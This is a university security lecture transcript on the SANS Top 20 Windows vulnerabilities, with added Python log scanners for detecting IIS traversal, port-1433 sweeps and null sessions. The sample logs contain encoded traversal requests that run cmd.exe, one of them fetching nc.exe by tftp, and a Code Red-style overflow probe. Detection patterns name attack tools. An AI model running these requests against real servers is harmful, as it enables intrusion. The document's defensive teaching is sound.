
Windows Exploits Overview and Common Vulnerabilities
Discover the most common Windows exploits, vulnerable ports, and critical Internet security vulnerabilities as outlined in the SANS Top 20 list. Explore the risks associated with services like Internet Information Services (IIS) and how attackers exploit these vulnerabilities. Learn about failure to handle unanticipated requests, buffer overflows, and other security weaknesses that could leave your systems exposed.
Presentation Transcript
Lesson 12 Common Windows Exploits
Overview
- Top 20 Exploits
- Common Vulnerable Ports
- Detecting Events
UTSA IS 6353 ID and Incident Response
SANS Top 20 List
- A published list of the Twenty Most Critical Internet Security Vulnerabilities: www.sans.org/top20
- Thousands use this list to close up holes in their systems
- Most incidents trace back to items on the Top 20 list
SANS Top 20 List
- Based on the observation that attackers are opportunistic: they
  - take the easiest and most convenient route
  - exploit the best-known flaws with the most effective and widely available attack tools
  - count on organizations not fixing the holes
SANS Top 20 List
- The list is broken down into six sections
- Commonly exploited vulnerable services in Windows, Unix, Web applications, etc.
- Let's check it out
W1: Internet Information Services (IIS)
- IIS is prone to vulnerabilities in three major classes:
  - Failure to handle unanticipated requests
  - Buffer overflows
  - Sample applications
- Target port: TCP port 80 (HTTP)
Failure to Handle Unanticipated Requests
- IIS has a problem handling improperly formed HTTP requests
- Web folder traversal (Unicode): a ../ sequence whose separator is sent as an overlong UTF-8 encoding (e.g. %c0%af) or double-encoded (e.g. %255c) passes the path check and is only decoded afterwards
- This allows
  - viewing the source code of scripted applications
  - viewing files outside the Web document root
  - viewing files the Web server has been instructed not to serve
  - executing arbitrary commands on the server
  - deleting files, uploading rootkits, creating backdoors
Buffer Overflows
- Many ISAPI and SSI extensions are vulnerable to buffer overflows: .asp / .htr / .idq / .printer
- A carefully crafted request from a remote attacker may result in
  - Denial of service
  - Execution of arbitrary code and/or commands in the Web server's user context, through the IUSR_servername account (an anonymous-style account)
- Caveat: ISAPI extensions such as idq.dll loaded in-process on IIS 4.0 and 5.0 ran inside inetinfo.exe as Local System, so an overflow there (the .ida/.idq flaw used by the Code Red worm) yields SYSTEM rather than IUSR privileges
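The two IIS attack classes on the slides above both leave distinctive traces in the Web server's own logs. The script below is an added example, not part of the lesson or of any SANS or Microsoft tool: it reads IIS W3C-extended log lines, decodes each request the way the vulnerable server did (double percent-decoding plus acceptance of overlong UTF-8) so encoded traversal becomes visible, and flags requests for the ISAPI extensions mentioned above, treating a very long or %u-encoded query as an overflow probe. All log lines are constructed, and the rule names and the 200-byte threshold are my own choices.

```python
"""Added example (not part of the lesson): scan IIS W3C-extended log lines
for the two IIS attack classes above. Every log line below is constructed;
the rule names and thresholds are my own choices, not a SANS or IIS standard."""
import re
from urllib.parse import unquote_to_bytes

# Shape of the Code Red .ida probe: a long run of filler followed by %u-encoded shellcode.
CODE_RED_QUERY = "N" * 224 + "%u9090%u6858%ucbd3%u7801"

# Constructed log lines. Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = "\n".join([
    "2002-05-10 14:02:11 192.0.2.10 GET /default.htm - 200",
    "2002-05-10 14:02:15 198.51.100.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200",
    "2002-05-10 14:02:19 198.51.100.7 GET /scripts/..%255c../winnt/system32/cmd.exe "
    "/c+tftp+-i+198.51.100.7+GET+nc.exe 502",
    "2002-05-10 14:03:02 203.0.113.9 GET /default.ida " + CODE_RED_QUERY + " 200",
    "2002-05-10 14:03:40 192.0.2.11 GET /images/logo.gif - 200",
    "2002-05-10 14:04:05 203.0.113.9 GET /NULL.printer - 500",
])

TRAVERSAL = re.compile(r"\.\.[\\/]")                       # '..' followed by a separator
ISAPI_EXT = re.compile(r"\.(ida|idq|htr|printer)$", re.I)   # script maps worth removing if unused
TOOLS = re.compile(r"cmd\.exe|root\.exe|tftp", re.I)        # what attackers run once traversal works


def decode_like_buggy_iis(raw: str) -> str:
    """See the path the way vulnerable IIS saw it after its security check:
    percent-decode twice (the double-decode bug, so %255c becomes a backslash)
    and accept overlong two-byte UTF-8 (the unicode bug, so %c0%af becomes '/'
    and %c1%9c becomes a backslash)."""
    data = unquote_to_bytes(unquote_to_bytes(raw))
    out = bytearray()
    i = 0
    while i < len(data):
        lead = data[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((lead & 0x1F) << 6) | (data[i + 1] & 0x3F))  # overlong form of an ASCII byte
            i += 2
        else:
            out.append(lead)
            i += 1
    return out.decode("latin-1")


def scan_iis_log(text: str) -> list[dict]:
    """Return one finding per (request, rule) pair; benign requests produce nothing."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        _date, _time, client, _method, stem, query, status = fields[:7]
        query = "" if query == "-" else query
        decoded = decode_like_buggy_iis(stem + "?" + query)
        rules = []
        if TRAVERSAL.search(decoded):
            rules.append("directory-traversal")
        if TOOLS.search(decoded):
            rules.append("command-execution")
        if ISAPI_EXT.search(stem):
            rules.append("isapi-extension-request")
            # Overflow probes carry a very long or %u-encoded query (as Code Red did);
            # the .printer overflow lived in the Host header, so it only shows up as a request.
            if len(query) > 200 or "%u" in query.lower():
                rules.append("isapi-overflow-probe")
        for rule in rules:
            findings.append({"client": client, "rule": rule, "stem": stem, "status": status})
    return findings


def suspects(findings: list[dict]) -> dict[str, set[str]]:
    """Group the rules that fired by client address, for triage."""
    by_client: dict[str, set[str]] = {}
    for f in findings:
        by_client.setdefault(f["client"], set()).add(f["rule"])
    return by_client


if __name__ == "__main__":
    for client, rules in suspects(scan_iis_log(SAMPLE_LOG)).items():
        print(client, sorted(rules))
```

Run against the constructed log, it reports 198.51.100.7 for traversal plus command execution and 203.0.113.9 for ISAPI probing, and stays silent on the two benign clients. The decode step matters more than the pattern list: a signature written for `%c0%af` alone misses `%c1%9c`, `%255c` and the other encodings, whereas decoding the way the server did catches all of them at once.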
W2: Microsoft SQL Server
- Microsoft SQL Server contains several serious vulnerabilities that allow remote attackers to
  - obtain information
  - alter database content
  - compromise SQL servers
  - compromise server hosts
- There was an MSSQL worm released in May 2002 (it spread by logging in over port 1433 as the built-in sa account on servers where that account had no password)
W2: Microsoft SQL Server
- Target port: TCP port 1433 (named instances are located through the SQL Server Resolution Service on UDP port 1434, so watch that port too)
- Versions affected:
  - Microsoft SQL Server 7.0
  - Microsoft SQL Server 2000
  - Microsoft SQL Server 2000 Desktop Engine (MSDE), which ships bundled inside other products and is easy to overlook
W2: Microsoft SQL Server
- How to detect a compromise:
  - The first thing you will see is the probing, or fishing for information
  - Probes on port 1433
  - The attacker is looking for boxes that respond positively to a probe on port 1433: a response tells them the box is listening on (has open) port 1433
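The probing described above shows up at the perimeter as one source touching many hosts on TCP 1433 in a short time, and the box that answers is the one to triage. The script below is an added example, not part of the lesson: it parses constructed firewall log lines, flags a source as a sweep when it contacts at least five distinct hosts on 1433 within sixty seconds, and then lists the hosts that accepted a connection from that source. The log format, the thresholds and the addresses are my own assumptions.

```python
"""Added example (not part of the lesson): spot the port-1433 probing described
above in perimeter firewall logs, then list the hosts that answered the prober.
The log lines are constructed and the thresholds are my own choices."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed firewall log. Fields: date time src dst proto dport action
SAMPLE_FW_LOG = """\
2002-05-21 02:10:01 198.51.100.7 192.0.2.10 tcp 1433 DROP
2002-05-21 02:10:01 198.51.100.7 192.0.2.11 tcp 1433 DROP
2002-05-21 02:10:02 198.51.100.7 192.0.2.12 tcp 1433 DROP
2002-05-21 02:10:02 198.51.100.7 192.0.2.13 tcp 1433 DROP
2002-05-21 02:10:03 198.51.100.7 192.0.2.14 tcp 1433 DROP
2002-05-21 02:10:03 198.51.100.7 192.0.2.15 tcp 1433 DROP
2002-05-21 02:10:04 198.51.100.7 192.0.2.20 tcp 1433 ACCEPT
2002-05-21 02:10:09 198.51.100.7 192.0.2.20 tcp 1433 ACCEPT
2002-05-21 02:15:00 203.0.113.4 192.0.2.20 tcp 1433 ACCEPT
2002-05-21 03:00:00 192.0.2.50 192.0.2.20 tcp 1433 ACCEPT
"""


def parse_fw_log(text):
    """Return (timestamp, src, dst, proto, dport, action) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, time, src, dst, proto, dport, action = line.split()
        events.append((datetime.fromisoformat(f"{date} {time}"), src, dst, proto, int(dport), action))
    return events


def find_sweeps(events, port=1433, min_targets=5, window=timedelta(seconds=60)):
    """Sources that touched at least min_targets distinct hosts on `port` within `window`.
    Returns {src: every target that source touched on the port}."""
    per_src = defaultdict(list)
    for ts, src, dst, proto, dport, _action in events:
        if proto == "tcp" and dport == port:
            per_src[src].append((ts, dst))
    sweeps = {}
    for src, hits in per_src.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            in_window = {dst for ts, dst in hits[i:] if ts - start <= window}
            if len(in_window) >= min_targets:
                sweeps[src] = {dst for _, dst in hits}
                break
    return sweeps


def exposed_servers(events, sweeps, port=1433):
    """Hosts that accepted a connection on `port` from a sweeping source: they answered
    the probe, so they are listening and need their patch level and sa password checked."""
    answered = defaultdict(set)
    for _ts, src, dst, _proto, dport, action in events:
        if src in sweeps and dport == port and action == "ACCEPT":
            answered[dst].add(src)
    return dict(answered)


if __name__ == "__main__":
    ev = parse_fw_log(SAMPLE_FW_LOG)
    sw = find_sweeps(ev)
    for src, targets in sw.items():
        print(f"sweep from {src}: {len(targets)} hosts probed on 1433")
    for host, sources in exposed_servers(ev, sw).items():
        print(f"triage {host}: answered prober(s) {sorted(sources)}")
```

On the constructed log only 198.51.100.7 qualifies as a sweep (seven hosts in three seconds); 203.0.113.4 and the internal 192.0.2.50 each talk to a single server and are left alone. The accepted connection from the sweeper to 192.0.2.20 is the finding that matters: that host is reachable on 1433 from outside and has already been found by someone who was looking.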
W3: General Windows Authentication
- Accounts with no passwords or weak passwords
- The only protection is a strong password and good password habits
- With the advent of Windows XP, consider running everyday accounts at user (non-administrator) privilege
W3: LAN Manager Authentication
- Most current Windows environments have no need for LAN Manager (LM) authentication, which relies on a weak hashing scheme; most use NTLM now
- But Windows NT, 2000 and XP still generate and store the LM hash by default
- LM has a very weak scheme: the password is upper-cased, padded to 14 characters and split into two 7-character halves, and each half is hashed independently (as a DES key encrypting a fixed constant)
- It won't take an attacker long to crack these passwords
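The weakness is in what LM does to the password before any cryptography happens. The code below is an added example, not part of the lesson: it reproduces the LM pre-processing (upper-casing, padding to 14 bytes, splitting into two independent 7-byte halves) and works out what that costs the defender. The DES step that turns each half into the stored hash is deliberately left out; only the key material is shown. The use of ASCII in place of the OEM code page and the 69-character LM alphabet are assumptions.

```python
"""Added example (not part of the lesson): what LM does to a password before
hashing, and why that makes cracking cheap. The real hash encrypts the constant
KGS!@#$% with each half as a DES key; that DES step is deliberately left out here."""

EMPTY_HALF = b"\x00" * 7   # the LM hash of this half is always AAD3B435B51404EE


def lm_key_halves(password: str) -> tuple[bytes, bytes]:
    """LM pre-processing: upper-case, force to 14 bytes (truncate or NUL-pad),
    split into two 7-byte halves that are hashed independently.
    (Real LM uses the OEM code page; ASCII is assumed here.)"""
    raw = password.upper().encode("ascii", "replace")[:14].ljust(14, b"\x00")
    return raw[:7], raw[7:]


def second_half_is_empty(password: str) -> bool:
    """True when the password has 7 or fewer characters: the second half is the
    well-known constant, which tells an attacker the length before cracking starts."""
    return lm_key_halves(password)[1] == EMPTY_HALF


def case_aliases(password: str) -> int:
    """Distinct passwords (differing only in letter case) that share this LM hash."""
    return 2 ** sum(ch.isalpha() for ch in password[:14])


def lm_hash_stored(password: str) -> bool:
    """Windows cannot store an LM hash for a password longer than 14 characters,
    so a 15+ character password side-steps LM without any registry change."""
    return len(password) <= 14


def lm_worst_case_guesses(charset_size: int) -> int:
    """Guesses to exhaust both halves independently: 2 * sum(c^n for n in 0..7)."""
    return 2 * sum(charset_size ** n for n in range(8))


def full_keyspace_guesses(charset_size: int, max_len: int = 14) -> int:
    """Guesses to exhaust a hash that keeps case and hashes all 14 characters at once."""
    return sum(charset_size ** n for n in range(1, max_len + 1))


if __name__ == "__main__":
    print(lm_key_halves("Password123456"))      # (b'PASSWOR', b'D123456')
    print(second_half_is_empty("Secret1"))       # True
    # 69 = LM's effective alphabet (26 upper + 10 digits + 33 symbols); 95 = printable ASCII
    print(full_keyspace_guesses(95) // lm_worst_case_guesses(69))
```

Two things fall out of this. A 14-character mixed-case password costs an LM cracker two separate 7-character searches over a 69-symbol alphabet, which is why it "won't take long": the ratio to the full 14-character, case-sensitive keyspace exceeds 10^12. And because the second half of any password of 7 characters or fewer is a constant, the attacker knows the length before starting. The practical fixes follow directly: stop storing the hash (the NoLMHash policy on Windows 2000 SP2 and later, or passwords of 15+ characters), and raise LmCompatibilityLevel so LM responses are not sent on the wire.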
W3: Unprotected Windows Networking Shares (NetBIOS)
- OSs affected: Windows 95, Windows 98, Windows NT, Windows Me, Windows 2000 and Windows XP
- Main objective: gather info about guest host names
  - try these guest host names with null passwords until one works
  - the attacker will then attempt to download the entire database of user IDs and/or passwords
W4: Internet Explorer
- Consequences can include
  - Disclosure of cookies
  - Disclosure of local files or data *
  - Execution of local programs *
  - Download and execution of arbitrary code *
  - Complete takeover of the vulnerable system *
  (* most critical)
W4: Internet Explorer
- Default web browser installed on MS Windows platforms
- All existing IE versions have critical vulnerabilities
- A malicious web administrator can design web pages to exploit these vulnerabilities
- All it takes is someone browsing to the web page
W4: Internet Explorer
- Vulnerabilities can be categorized into multiple classes:
  - Web page spoofing
  - ActiveX control vulnerabilities
  - Active scripting vulnerabilities
  - MIME-type and content-type misinterpretation
  - Buffer overflows
W5: Unprotected Windows Networking Shares (NetBIOS)
- MS Windows provides a host with the ability to share files or folders across a network
- The underlying mechanism of this feature is the Server Message Block (SMB) protocol, also known as the Common Internet File System (CIFS) protocol
- Target port: TCP port 139 (NetBIOS session service); on Windows 2000 and later SMB is also offered directly on TCP port 445, so check both
W5: Anonymous Logon -- Null Sessions
- This vulnerability is very similar to the NetBIOS one described before
- The attacker is looking for a host that accepts a connection with a null (empty) password
- The attacker connects to the IPC$ share (the inter-process communication share) with a pair of double quotes ("") in place of a password, which yields an anonymous session that can enumerate users, groups and shares
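A null session does leave a record on the target: a successful network logon (event 540 on NT 4.0 SP4, 2000, XP and 2003; 4624 from Vista on) with logon type 3 and the user ANONYMOUS LOGON in the NT AUTHORITY domain. The script below is an added example, not part of the lesson or of any Microsoft tool: it walks constructed Security log records written in a simplified key=value form (real logs are EVT/EVTX and would be exported first), picks out anonymous network logons from sources that are not on a known-host list, and singles out sources that opened null sessions to more than one machine, which is the enumeration pattern rather than a one-off misconfigured client. The record layout, the allow-list and the addresses are my own assumptions.

```python
"""Added example (not part of the lesson): find null-session logons in Windows
Security log records. The records below are constructed in a simplified
key=value form (real logs are EVT/EVTX); the known-host allow-list is an assumption."""
import shlex
from collections import defaultdict

# 540 = successful network logon (NT 4.0 SP4 / 2000 / XP / 2003); 4624 = its successor from Vista on.
NETWORK_LOGON_EVENTS = {"540", "4624"}

SAMPLE_EVENTS = """\
EventID=540 Computer=FILESRV01 User="ANONYMOUS LOGON" Domain="NT AUTHORITY" LogonType=3 Workstation=KALIBOX Source=198.51.100.7
EventID=540 Computer=FILESRV01 User=jsmith Domain=CORP LogonType=3 Workstation=WS-042 Source=192.0.2.42
EventID=540 Computer=DC01 User="ANONYMOUS LOGON" Domain="NT AUTHORITY" LogonType=3 Workstation=KALIBOX Source=198.51.100.7
EventID=540 Computer=DC01 User="ANONYMOUS LOGON" Domain="NT AUTHORITY" LogonType=3 Workstation=DC02 Source=192.0.2.5
EventID=528 Computer=DC01 User=administrator Domain=CORP LogonType=2 Workstation=DC01 Source=-
"""


def parse_events(text):
    """One dict per record; shlex keeps quoted values such as "ANONYMOUS LOGON" together."""
    records = []
    for line in text.splitlines():
        if line.strip():
            records.append(dict(tok.split("=", 1) for tok in shlex.split(line)))
    return records


def null_sessions(records, known_hosts=frozenset()):
    """{source: set of computers} for anonymous network logons, ignoring known_hosts
    (domain controllers and similar legitimately make some anonymous connections)."""
    hits = defaultdict(set)
    for r in records:
        if (r.get("EventID") in NETWORK_LOGON_EVENTS
                and r.get("LogonType") == "3"
                and r.get("User", "").upper() == "ANONYMOUS LOGON"
                and r.get("Source") not in known_hosts):
            hits[r["Source"]].add(r["Computer"])
    return dict(hits)


def enumeration_candidates(hits, min_hosts=2):
    """Sources that opened null sessions to several hosts: the enumeration pattern,
    as opposed to a one-off misconfigured client."""
    return sorted(src for src, hosts in hits.items() if len(hosts) >= min_hosts)


if __name__ == "__main__":
    hits = null_sessions(parse_events(SAMPLE_EVENTS), known_hosts={"192.0.2.5"})
    for src, hosts in hits.items():
        print(f"null session from {src} to {sorted(hosts)}")
    print("enumeration candidates:", enumeration_candidates(hits))
```

With 192.0.2.5 (the second domain controller, assumed legitimate) on the allow-list, only 198.51.100.7 is reported, and it is reported as an enumeration candidate because it touched both the file server and the domain controller. The logon event alone does not show what was enumerated afterwards; the remedy is to stop anonymous sessions from seeing anything by raising RestrictAnonymous, and to keep 139 and 445 away from untrusted networks.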
W6: Microsoft Data Access Components (MDAC) -- Remote Data Services
- The RDS component in older versions of MDAC has flaws that allow a remote user to run commands locally with administrative privileges
- This exploit is readily used to deface Web pages
- Check the Web server logs to make sure: the RDS flaw is reached through requests for /msadc/msadcs.dll, so look for that path
W7: Windows Scripting Host (WSH)
- Permits any text file with a .vbs extension to be executed as a Visual Basic script
- A typical worm propagates by embedding a VBScript in another file (such as an e-mail attachment) that executes when that file is viewed or, in some cases, merely previewed
The Other Three
- W8: Outlook and Outlook Express
- W9: P2P File Sharing
- W10: Simple Network Management Protocol (SNMP)
Common Vulnerable Ports
Ports the SANS Top 20 recommends blocking at the perimeter unless the service is deliberately exposed:
- Login services
  - telnet (port 23/tcp)
  - SSH (port 22/tcp)
  - FTP (port 21/tcp)
  - NetBIOS (port 139/tcp)
  - rlogin and related r-services (ports 512-514/tcp)
Common Vulnerable Ports
- RPC and NFS
  - portmap/rpcbind (port 111/tcp and udp)
  - NFS (port 2049/tcp and udp)
  - lockd (port 4045/tcp and udp)
- X Windows (ports 6000/tcp through 6255/tcp)
Common Vulnerable Ports
- Naming services
  - DNS (port 53/udp) for all machines that are not DNS servers
  - DNS (port 53/tcp) for zone transfer requests
  - LDAP (port 389/tcp and udp)
Common Vulnerable Ports
- Mail
  - SMTP (port 25/tcp) for all machines that are not external mail relays
  - POP (port 109/tcp and port 110/tcp)
  - IMAP (port 143/tcp)
Common Vulnerable Ports
- Web
  - HTTP (port 80/tcp)
  - SSL (port 443/tcp), except to external Web servers
  - HTTP proxies: port 8000/tcp, port 8080/tcp, port 8888/tcp
Common Vulnerable Ports
- Small services
  - ports below 20/tcp and udp
  - time (port 37/tcp and udp)
- Miscellaneous
  - TFTP (port 69/udp)
  - Finger (port 79/tcp)
  - NNTP (port 119/tcp)
Common Vulnerable Ports
- Miscellaneous (continued)
  - NTP (port 123/udp)
  - LPD (port 515/tcp)
  - syslog (port 514/udp)
  - SNMP (port 161/tcp and udp, and port 162/tcp and udp)
  - BGP (port 179/tcp)
  - SOCKS (port 1080/tcp)
Common Vulnerable Ports
- ICMP
  - block incoming echo requests (ping and Windows traceroute)
  - block outgoing echo replies, time exceeded, and destination unreachable, except packet-too-big messages (which path MTU discovery depends on)
How To Detect and Investigate
- http://www.sans.org/critical-security-controls/vendor-solutions/
- http://www.sans.org/critical-security-controls/
- Run an IDS and review its logs for common signatures, especially IIS hacks
- Aggressively review Web server logs
- Ensure FTP application logging is turned on, then review the FTP logs
- Know your network and know what is abnormal